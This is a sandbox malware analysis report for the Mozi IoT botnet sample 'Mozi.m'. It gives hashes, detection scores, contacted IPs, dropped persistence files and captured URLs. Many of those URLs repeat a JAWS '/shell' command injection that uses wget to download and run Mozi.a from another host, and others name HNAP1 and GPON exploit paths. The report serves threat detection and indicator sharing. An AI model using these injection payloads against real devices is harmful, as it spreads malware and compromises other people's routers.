Mozi.m

Status: finished

Submission Time: 2020-04-18 04:03:56 +02:00

Malicious

Spreader

Trojan

Evader

Mirai

Comments

Details

Analysis ID:
223571
API (Web) ID:
343772
Analysis Started:

2020-04-18 04:08:18 +02:00
Analysis Finished:

2020-04-18 04:16:20 +02:00
MD5:
4dde761681684d7edad4e5e1ffdb940b
SHA1:
2327be693bc11a618c380d7d3abc2382d870d48b
SHA256:
d546509ab6670f9ff31783ed72875dfc0f37fa2b666bd5870eecaaed2ebea4a8
Technologies:

Engines
IOCs

Joe Sandbox

Engine	Download Report	Detection	Info
	Full Report Management Report IOC Report	malicious Score: 100	System: Ubuntu Linux 16.04 x64 (Kernel 4.4.0-116, Firefox 88.0, Document Viewer 3.18.2, LibreOffice 5.1.6.2, OpenJDK 1.8.0_171)

Third Party Analysis Engines

Open Full Report

malicious

Score: 37/59

Open Full Report

malicious

Score: 16/40

malicious

Score: 17/31

malicious

IPs

IP	Country	Detection
84.29.0.137	Netherlands
142.104.97.155	Canada
192.16.164.5	Switzerland
Click to see the 97 hidden entries
221.108.30.124	Japan
206.217.171.86	United States
86.15.156.51	United Kingdom
155.7.120.254	United States
181.7.141.57	Argentina
193.0.27.157	Netherlands
210.30.104.186	China
202.102.247.113	China
71.34.159.253	United States
203.100.70.190	India
203.54.202.213	Australia
204.13.119.146	United States
207.186.205.191	United States
27.239.240.141	Korea Republic of
139.212.218.204	China
12.203.138.74	United States
24.15.141.7	United States
157.121.249.201	United States
179.32.91.211	Colombia
190.228.167.37	Argentina
48.90.1.34	United States
174.123.214.105	United States
20.239.189.132	United States
146.212.214.168	Slovenia
186.183.212.16	Colombia
140.29.128.87	United States
5.237.62.134	Iran (ISLAMIC Republic Of)
34.188.74.41	United States
203.245.221.140	Korea Republic of
175.148.140.16	China
58.132.146.208	China
61.31.188.31	Taiwan; Republic of China (ROC)
124.199.228.64	Korea Republic of
83.215.50.183	Austria
95.63.238.180	Spain
30.238.152.6	United States
196.225.252.168	Tunisia
108.181.3.210	Canada
74.91.219.62	United States
39.143.89.69	China
175.77.228.54	China
60.187.251.41	China
2.173.191.241	Germany
110.217.223.239	China
172.118.240.123	United States
110.128.6.112	Japan
105.39.227.197	Egypt
195.165.142.63	Finland
166.73.192.99	United States
91.54.122.238	Germany
17.112.192.80	United States
83.159.171.125	France
75.62.34.1	United States
60.71.68.186	Japan
180.94.69.71	Afghanistan
101.5.179.135	China
26.160.220.81	United States
109.99.207.3	Romania
92.49.194.52	Kazakhstan
82.254.87.60	France
190.60.6.103	Colombia
46.152.78.129	Saudi Arabia
177.23.130.59	unknown
213.172.147.8	South Africa
219.49.104.34	Japan
3.86.17.114	United States
95.136.209.65	France
187.19.193.203	Brazil
87.3.40.196	Italy
58.192.204.84	China
16.167.214.232	United States
75.156.204.88	Canada
28.202.182.70	United States
147.169.168.85	United States
211.47.159.211	Korea Republic of
205.18.76.215	United States
147.48.0.44	United States
75.36.2.121	United States
27.194.53.165	China
209.115.26.189	United States
122.1.205.4	Japan
204.208.175.35	United States
83.252.95.53	Sweden
163.132.227.157	Japan
5.51.101.24	France
59.61.182.149	China
195.54.51.64	Poland
18.208.244.227	United States
77.110.174.99	Hungary
93.77.62.22	Ukraine
60.177.33.251	China
91.58.202.156	Germany
31.157.221.89	Italy
23.149.22.106	Reserved
51.93.252.123	United States
25.145.148.18	United Kingdom
214.91.170.138	United States

URLs

Name	Detection
http://125.162.23.210:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
http://84.118.24.169:80/HNAP1/
http://72.24.245.109:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
Click to see the 27 hidden entries
http://23.62.149.14:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
http://173.223.119.209:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
http://180.244.252.53:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
http://47.254.234.252:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
http://104.24.174.179:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
http://104.108.143.67:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
http://206.210.24.192:80/HNAP1/
http://52.24.22.135:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
http://127.0.0.1:80/GponForm/diag_Form?images/
http://50.118.140.150:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
http://154.197.61.112:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
http://47.99.190.174:80/HNAP1/
http://3.113.245.165:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
http://www.alsa-project.org/alsa-info.sh
http://www.pastebin.ca.
http://www.alsa-project.org.
http://120.51.221.228:49152/soap.cgi?service=WANIPConn1
http://upx.sf.net
http://www.pastebin.ca/upload.php
http://www.pastebin.ca
http://70.99.107.97:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
http://pastebin.ca/quiet-paste.php?api=$PASTEBINKEY&encrypt=t&encryptpw=blahblah
http://pastebin.ca)
http://14.63.136.13:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
http://www.alsa-project.org
http://pastebin.ca/quiet-paste.php?api=$PASTEBINKEY
http://www.alsa-project.org/cardinfo-db/

Dropped files

Name	File Type	Hashes
/etc/init.d/mountdevsubfs.sh	ASCII text	#
/usr/networks	ELF 32-bit MSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, stripped	#
/etc/rcS.d/S95baby.sh	POSIX shell script, ASCII text executable	#
Click to see the 97 hidden entries
/etc/rc.local	ASCII text	#
/etc/profile.d/vte-2.91.sh	ASCII text	#
/etc/profile.d/cedilla-portuguese.sh	ASCII text	#
/etc/profile.d/bash_completion.sh	ASCII text	#
/etc/profile.d/apps-bin-path.sh	ASCII text	#
/etc/profile.d/Z97-byobu.sh	ASCII text	#
/etc/init.d/umountnfs.sh	ASCII text	#
/etc/init.d/mountnfs.sh	ASCII text	#
/etc/init.d/mountnfs-bootclean.sh	ASCII text	#
/etc/init.d/mountkernfs.sh	ASCII text	#
/etc/init.d/mountall.sh	ASCII text	#
/etc/init.d/hwclock.sh	ASCII text	#
/etc/init.d/S95baby.sh	POSIX shell script, ASCII text executable	#
/etc/init.d/bootmisc.sh	ASCII text	#
/etc/init.d/checkfs.sh	ASCII text	#
/etc/init.d/checkroot-bootclean.sh	ASCII text	#
/etc/init.d/checkroot.sh	ASCII text	#
/etc/init.d/hostname.sh	ASCII text	#
/etc/init.d/mountall-bootclean.sh	ASCII text	#
/usr/share/doc/git/contrib/remotes2config.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-revert.sh	ASCII text	#
/usr/share/doc/git/contrib/rerere-train.sh	ASCII text	#
/usr/share/doc/git/contrib/subtree/git-subtree.sh	ASCII text	#
/usr/share/doc/git/contrib/subtree/t/t7900-subtree.sh	ASCII text	#
/usr/share/doc/git/contrib/thunderbird-patch-inline/appp.sh	ASCII text	#
/usr/share/doc/hddtemp/contribs/analyze/graph-field.sh	ASCII text	#
/usr/share/doc/git/contrib/git-resurrect.sh	ASCII text	#
/usr/share/doc/git/contrib/fast-import/git-import.sh	ASCII text	#
/usr/share/doc/hddtemp/contribs/analyze/hddtemp_monitor.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-whatchanged.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-verify-tag.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-tag.sh	ASCII text	#
/usr/share/doc/netcat-openbsd/examples/dist.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-resolve.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-reset.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-repack.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-pull.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-notes.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-merge.sh	ASCII text	#
/usr/share/doc/mdadm/examples/mdadd.sh	ASCII text	#
/usr/share/keyutils/request-key-debug.sh	ASCII text	#
/usr/share/hplip/hplip_clean.sh	ASCII text	#
/usr/share/doc/xdotool/examples/ffsp.sh	ASCII text	#
/usr/share/doc/transmission-common/examples/send-email-when-torrent-done.sh	ASCII text	#
/usr/share/doc/toshset/toshiba-acpi/2.6.28/install.sh	ASCII text	#
/usr/share/doc/toshset/toshiba-acpi/2.6.26/install.sh	ASCII text	#
/usr/share/doc/tmux/examples/bash_completion_tmux.sh	ASCII text	#
/usr/share/doc/popularity-contest/examples/bin/popcon-process.sh	ASCII text	#
/usr/share/doc/gdb/contrib/gdb-add-index.sh	ASCII text	#
/usr/share/doc/hddtemp/contribs/hddtemp-all.sh	ASCII text	#
/usr/share/doc/lm-sensors/examples/tellerstats/tellerstats.sh	ASCII text	#
/usr/share/doc/lm-sensors/examples/tellerstats/gather.sh	ASCII text	#
/usr/share/doc/lm-sensors/examples/daemon/healthd.sh	ASCII text	#
/usr/share/doc/libsane/plustek/MakeModule.sh	ASCII text	#
/usr/share/doc/ifupdown/examples/ping-places.sh	ASCII text	#
/usr/share/doc/ifupdown/examples/pcmcia-compat.sh	ASCII text	#
/usr/share/doc/ifupdown/examples/get-mac-address.sh	ASCII text	#
/usr/share/doc/ifupdown/examples/check-mac-address.sh	ASCII text	#
/etc/wpa_supplicant/ifupdown.sh	ASCII text	#
/usr/share/doc/acpid/examples/ac.sh	ASCII text	#
/usr/share/debconf/confmodule.sh	ASCII text	#
/usr/share/cups/braille/indexv4.sh	ASCII text	#
/usr/share/cups/braille/indexv3.sh	ASCII text	#
/usr/share/cups/braille/index.sh	ASCII text	#
/usr/share/cups/braille/cups-braille.sh	UTF-8 Unicode text	#
/usr/share/brltty/initramfs/brltty.sh	ASCII text	#
/usr/share/alsa/utils.sh	ASCII text	#
/usr/share/alsa-base/alsa-info.sh	ASCII text, with very long lines	#
/usr/share/doc/acpid/examples/default.sh	ASCII text	#
/etc/wpa_supplicant/functions.sh	ASCII text	#
/etc/wpa_supplicant/action_wpa.sh	ASCII text	#
/etc/libreoffice/soffice.sh	ASCII text	#
/etc/bash_completion.d/libreoffice.sh	ASCII text	#
/etc/acpi/undock.sh	ASCII text	#
/etc/acpi/tosh-wireless.sh	ASCII text	#
/etc/acpi/powerbtn.sh	ASCII text	#
/etc/acpi/ibm-wireless.sh	ASCII text	#
/etc/acpi/asus-wireless.sh	ASCII text	#
/usr/share/doc/git/contrib/convert-grafts-to-replace-refs.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-ls-remote.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-log.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-gc.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-fetch.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-commit.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-clone.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-clean.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-checkout.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-am.sh	OS/2 REXX batch file, ASCII text	#
/usr/share/doc/git/contrib/examples/git-merge-ours.sh	ASCII text	#
/etc/acpi/asus-keyboard-backlight.sh	ASCII text	#
/usr/share/doc/gdb/contrib/expect-read1.sh	ASCII text	#
/usr/share/doc/gdb/contrib/ari/gdb_find.sh	ASCII text	#
/usr/share/doc/gdb/contrib/ari/create-web-ari-in-src.sh	ASCII text	#
/usr/share/doc/gawk/examples/prog/igawk.sh	awk or perl script, ASCII text	#
/usr/share/doc/gawk/examples/network/PostAgent.sh	ASCII text	#
/usr/share/doc/cron/examples/cron-tasks-review.sh	ASCII text	#
/usr/share/doc/busybox-static/examples/mdev.conf.change_blockdev.sh	ASCII text	#

Mozi.m

Comments

Tags

Available tags:

Details

Joe Sandbox

Third Party Analysis Engines

IPs

URLs

Dropped files

Mozi.m Options

Comments

Tags

Available tags:

Details

Joe Sandbox

Third Party Analysis Engines

IPs

URLs

Dropped files

Search started

Mozi.m